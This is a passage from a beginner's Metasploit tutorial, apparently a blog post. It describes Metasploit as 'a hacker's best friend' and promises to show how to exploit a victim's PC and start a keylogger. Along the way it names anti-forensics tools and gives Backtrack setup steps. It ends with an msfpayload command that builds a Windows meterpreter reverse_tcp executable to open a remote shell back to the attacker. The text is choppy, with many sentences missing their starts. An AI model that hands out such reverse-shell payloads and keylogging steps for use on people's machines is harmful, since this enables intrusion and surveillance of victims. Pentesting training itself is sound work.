Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.
If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
have you ever wondered what someone can do to your PC, by just knowing
your IP. Here's the answer. He could 0wN you, or in other words , he
could have full access to your PC provided you have
just a few security loopholes which may arise cause of even a simple
reason like not updating your Flash player last week, when it prompted
you to do so.Metasploit is a hacker's best
friend, mainly cause it makes the job of exploitation and
post-exploitation a lot easier compared to other traditional methods of
topic Metasploit is very vast in itself. However, i'll try keeping it
basic and simple so that it could be understood by everyone here. Also,
Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).In
this tutorial, i'll be teaching you how to exploit a system using a
meterpreter payload and start a keylogger on the victim's machine.
Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.
I go into the details of The Metasploit Framework, let me give you a
little idea of some basic terms (may seem boring at first, but you must
be knowing them)
Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit:A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework,
used for developing and executing attacks against target systems. It
has a huge database of exploits, also it can be used to write our own
METASPLOIT ANTI FORENSICS:
has a great collection of tools for anti forensics, making the forensic
analysis of the compromised computer little difficult. They are
released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
would recommend using the MSF Console because of its effectiveness
& powerful from a pentester’s P0V. Another advantage of this mode
is, several sessions of msfconsole could be run simultaneously.
would recommend you doing the following things in Metasploit, on a
Backtrack(system or image), avoiding the windows version of the tool.
those of all who don't know, Backtrack is a linux distro especially for
security personals, including all the tools required by a pentester.
Download Backtrack from here.
You can download the ISO or VMware image, according to the one you're
comfortable with. If you have 2 access to more than 1 system physically,
then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
to start the wicd manager
Finally, type "startx" to start the GUI mode:
First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole
You should now be having a shell something similar to a command prompt in windows.
now create an executable file which establishes a remote connection
between the victim and us, using the meterpreter payload.
another shell window (”Session>>New Shell” or click on the small
icon on the left of the shell tab in the bottom left corner of the
./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip”
LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.